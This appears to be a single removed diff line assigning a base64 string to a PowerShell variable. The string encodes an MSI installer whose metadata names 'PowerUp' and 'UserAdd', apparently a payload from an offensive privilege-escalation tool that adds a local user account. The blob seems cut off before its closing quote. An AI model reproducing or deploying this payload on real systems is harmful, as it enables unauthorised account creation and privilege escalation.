-    $Binary = "0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgAEAP7/DAAGAAAAAAAAAAEAAAABAAAAAQAAAAAAAAAAEAAAAgAAAAEAAAD+////AAAAAAAAAAD///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP3////+/////v///y8AAAAFAAAABgAAAP7///8IAAAACQAAAAoAAAALAAAADAAAAA0AAAAOAAAADwAAABAAAAARAAAAEgAAABMAAAAUAAAAFQAAACwAAAAYAAAAFgAAABkAAAAaAAAAGwAAABwAAAAdAAAAHgAAAB8AAAAgAAAAIQAAACIAAAAjAAAAJAAAACUAAAAmAAAAJwAAACgAAAApAAAAKgAAACsAAAD+////LQAAAC4AAAAwAAAA/v///zEAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////9SAG8AbwB0ACAARQBuAHQAcgB5AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFgAFAP//////////AgAAAIQQDAAAAAAAwAAAAAAAAEYAAAAAAAAAAAAAAABQSJaT62LPAQMAAABAFwAAAAAAAAUAUwB1AG0AbQBhAHIAeQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoAAIBEAAAABkAAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANgBAAAAAAAAQEj/P+RD7EHkRaxEMUgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAgEVAAAAAwAAAP////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAEAgAAAAAAABASMpBMEOxOztCJkY3QhxCNEZoRCZCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAACAQQAAAABAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACoAAAAwAAAAAAAAAEBIykEwQ7E/Ej8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAIBEgAAAA0AAAD/////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKwAAABgAAAAAAAAAQEjKQflFzkaoQfhFKD8oRThCsUEoSAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAgH///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAKgAAAAAAAABASAtDMUE1RwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD///////////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP///////////////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA////////////////AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAIAAAADAAAABAAAAAUAAAAGAAAABwAAAP7/////////CgAAAAsAAAAMAAAADQAAAA4AAAAPAAAAEAAAABEAAAASAAAAEwAAABQAAAAVAAAAFgAAABcAAAAYAAAAGQAAABoAAAAbAAAAHAAAAB0AAAAeAAAAHwAAACAAAAAhAAAAIgAAACMAAAAkAAAAJQAAACYAAAAnAAAAKAAAACkAAAD+/////v////7////+////MwAAAP7////+/////v////7////+////OgAAADUAAAA2AAAA/v////7////+/////v///zsAAAA9AAAA/v///z4AAAA/AAAAQAAAAEEAAABCAAAAQwAAAEQAAABFAAAARgAAAEcAAABIAAAASQAAAEoAAAD+////TAAAAE0AAABOAAAATwAAAFAAAABRAAAAUgAAAFMAAABUAAAAVQAAAP7////+////WAAAAP7////+/////v///1wAAAD+//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////7/AAAGAQIAAAAAAAAAAAAAAAAAAAAAAAEAAADghZ/y+U9oEKuRCAArJ7PZMAAAAKgBAAAOAAAAAQAAAHgAAAACAAAAkAEAAAMAAACAAQAABAAAAHABAAAFAAAAgAAAAAYAAAAoAQAABwAAAJQAAAAJAAAAqAAAAAwAAADYAAAADQAAAOQAAAAOAAAA8AAAAA8AAAD4AAAAEgAAAAgBAAATAAAAAAEAAAIAAADkBAAAHgAAAAoAAABJbnN0YWxsZXIAAAAeAAAACwAAAEludGVsOzEwMzMAAB4AAAAnAAAAe0EwNDlFMzFGLTc3MDEtNEM0QS1BQ0JDLUIyNjBFQjA4QkI0Q30AAEAAAAAALfR1QTjPAUAAAAAALfR1QTjPAQMAAADIAAAAAwAAAAIAAAADAAAAAgAAAB4AAAAXAAAATVNJIFdyYXBwZXIgKDQuMS41NC4wKQAAHgAAAEAAAABJbnN0YWxsZXIgd3JhcHBlZCBieSBNU0kgV3JhcHBlciAoNC4xLjU0LjApIGZyb20gd3d3LmV4ZW1zaS5jb20AHgAAAAgAAABQb3dlclVwAB4AAAAIAAAAVXNlckFkZAAeAAAAEAAAAFVzZXJBZGQgMS4wLjAuMABBOM8BAwAAAMgAAAADAAAAAgAAAB4AAAArAAAAV2luZG93cyBJbnN0YWxsZXIgWE1MIFRvb2xzZXQgKDMuOC4xMTI4LjApAAADAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYABgAGAAYABgAGAAYABgAGAAYACgAKACIAIgAiACkAKQApACoAKgAqACsAKwAvAC8ALwAvAC8ALwA1ADUANQA9AD0APQA9AD0ATQBNAE0ATQBNAE0ATQBNAFwAXABhAGEAYQBhAGEAYQBhAGEAbwBvAHIAcgByAHMAcwBzAHQAdAB3AHcAdwB3AHcAdwCCAIIAhgCGAIYAhgCGAIYAkACQAJAAkACQAJAAkAACAAUACwAMAA0ADgAPABAAEQASAAcACQAjACUAJwAjACUAJwAjACUAJwABAC0AJQAvADEANAA3ADoANQBJAEsABAAjAEAAQwBGAAsANAA3AE0ATwBRAFQAVgBdAF8AJwA3AF8AYQBkAGcAaQBrAAEALQAjACUAJwAjACUAJwALACUAQAB4AHoAfAB+AIAABwCCAAEABwBfAIYAiACKADcAawCRAJMAlQCZAJsACAAIABgAGAAYABgAGAAIABgAGAAIAAgACAAYABgACAAYABgACAAYABgACAAIABgACAAYAAgACAAYAAgAGAAIAAgACAAYABgAGAAYABgACAAIABgAGAAYAAgACAAIAAgAGAAIAAgACAAIABgAGAAIAAgACAAYABgACAAYABgACAAIABgACAAIABgAGAAYAAgACAAYABgACAAIAAgACAAIABgACAAYABgAGAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAgAEAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAA/P//fwAAAAAAAAAA/P//fwAAAAAAAAAA/P//fwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAQAAgAAAAIAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA